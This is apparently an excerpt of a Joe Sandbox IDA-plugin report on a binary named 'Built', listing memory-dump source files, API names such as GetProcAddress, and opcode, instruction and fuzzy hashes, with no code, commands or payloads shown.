                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: TMP
                                                                      • API String ID: 3215553584-3125297090
                                                                      • Opcode ID: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
                                                                      • Instruction ID: fc2be89f2294a47f1daaef5bb5a629c62fc5696c87a6f9ec7bf01929a69ff23f
                                                                      • Opcode Fuzzy Hash: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
                                                                      • Instruction Fuzzy Hash: EE516F11F2C642D1FA64BA2659215BAD291AF54B84FC84435DE2E87FA7FE3CE8414238
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: HeapProcess
                                                                      • String ID:
                                                                      • API String ID: 54951025-0
                                                                      • Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                      • Instruction ID: 48e1dd4418903b0ab992d9a978d05b92a030b784ef89c4c3f75ad853e80333a1
                                                                      • Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
                                                                      • Instruction Fuzzy Hash: 9FB09220E2BB86C2EA087B116C8622862A57F88712FE48038C80C81320EE3C20A54720
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                      • Instruction ID: f02c032f3063661ddad3f94a69cb8b3f65ef848fef529915281819b04f8b8548
                                                                      • Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
                                                                      • Instruction Fuzzy Hash: 7ED1D722A2C642D5F778AF25816027DA7A0EF45B48F944135CE2D07E96EF79D841C738
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                      • Instruction ID: 0a025281eb2fc8711bad32e1e2091bf951baab1c13ddf3b949dff23caab08625
                                                                      • Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
                                                                      • Instruction Fuzzy Hash: 7AC1B4722142F18FD289FB29E45957A77D1F798309BD4402AEF8747F86CA3CA414DBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                      • Instruction ID: f462882c2b29ab65debf9ec8f0020504409993a8f907c132f11a4df2d2646ac5
                                                                      • Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
                                                                      • Instruction Fuzzy Hash: 77B1AB72A2C682C5E7749F29C06023CBBA0E745B48FA44135DF6E47B9AEF29D441C739
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                      • Instruction ID: c98245cdf3e15eb3b298559b471baca16ca799e080e41bf8cc8b005d36b8fd06
                                                                      • Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
                                                                      • Instruction Fuzzy Hash: E381F472A2C781C6E774DF199060379AA91EB85794F944236DEAD43F8AEE3DD0008F24
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                                      • Instruction ID: dbc5e5d06c35592e01b9e38cd986d481630c7191c8687f823925605e4bf7433b
                                                                      • Opcode Fuzzy Hash: 1c784b8d4a055adf8560f3681b96f10fe234dcf2bfc90e734f7112d08b46dadd
                                                                      • Instruction Fuzzy Hash: 9B61FC22E2C192C6F764BA28845027DE691AF58770FD44239DE6D86ED3FE7DE840C720
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                      • Instruction ID: d401d793d1c66e74783c78ee5a05fbc6097fe9f88d7938a2f5c3e583baeb6d11
                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                      • Instruction Fuzzy Hash: 8B51A436A3C651C2E7249B29C060638B3A1EB45F68F644131CE6D47BD6EB3AE843C774
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                      • Instruction ID: bc9c4f22bd2c52159c0c0964ac5820906752c6553ee21d5cc453a4e842399d30
                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                      • Instruction Fuzzy Hash: 4F519776A2C651C6E7249F29C050A3873A0EB45F68F644131CE6D07F96EF3AE843CB64
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                      • Instruction ID: 922a578f8b4e6b5376339f7200aed2f14d870b1cc843865746e503277c1eec01
                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                      • Instruction Fuzzy Hash: 0751B932A2C651C6E7249B2EC06033CB7A0EB44B58F644132DE5C47BE6DB3AE843C764
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                      • Instruction ID: 35e98d6d9a52b633b17cfc9fc36d94594908e4e2a0d988e9e0f6bcc66dfa1392
                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                      • Instruction Fuzzy Hash: 5F51A83662C651C6E7249B2DC06063C67A1EB44B58F644132CE5C57B96EF3AE843C774
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                      • Instruction ID: 918b201ee2bc26c7f48ec4f468257f63d3498faf27b87a5c1fb4b51fb253539f
                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                      • Instruction Fuzzy Hash: D451C732A2CA51C5E7249B29C05063CB7A1EB44B98FA44131CE5D47F9AEF3AE842C774
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                      • Instruction ID: c3bb1c53240b024c13acdc9ec167b3958b8ff69921a4e90cef4d359b12c1a06a
                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                      • Instruction Fuzzy Hash: 4651B536A2C651C5E7249B2EC06023CB7A0EB54B58F684132CE5D17B96EB3AEC43C774
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                      • Instruction ID: bb0db47b5e297ffacf5c0be77f62ebe13134261bcb18d8d6cc7094a9c487ac50
                                                                      • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                      • Instruction Fuzzy Hash: CA412456C2D74AC0E955995804303B4E780EF63BA1FE812B1CDF953FC7EC0D29868234
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                      • String ID:
                                                                      • API String ID: 588628887-0
                                                                      • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                      • Instruction ID: e0355e1e2758a8ddeb3ddcfdad49e89385a648ca7278fc9e9eb81d7212f8495d
                                                                      • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                      • Instruction Fuzzy Hash: F0411472728A55C2EF44DF2AD9241A9B3A2FB48FD0B899032DE1D97F59EE3CD0418714
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                      • Instruction ID: 62efee449dbb5ce1eaa0db9ed34f8127e22451b8529498f6a23c49bd1e9841c4
                                                                      • Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
                                                                      • Instruction Fuzzy Hash: 1231A731B2CB81C1E765AB25645013EAAD5AFC4B90F944239EE6E57F96EF3CD0014728
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                      • Instruction ID: f483d7ce9e84edf30249d1fa7b6447cc6bd6cc7a53bd8231c79335ddbf3ba245
                                                                      • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                      • Instruction Fuzzy Hash: 2DF06871B2C695CEDB989F29A80263977D5F7483C0FC08439E68D83F04E67C94508F14
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                      • Instruction ID: e40fbbcfb63711e99d13c60721488184e6407954275cd923c248cdc5abfeaf44
                                                                      • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                      • Instruction Fuzzy Hash: D7A0012192C927D0E648FB08E950135A220FB54301B801175D86E458A2AF2CA4418630
                                                                      APIs
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C50C0
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5101
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5126
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C514B
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5173
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C519B
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51C3
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C51EB
                                                                      • GetProcAddress.KERNEL32(?,00007FF76D5C5C57,?,00007FF76D5C308E), ref: 00007FF76D5C5213
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc
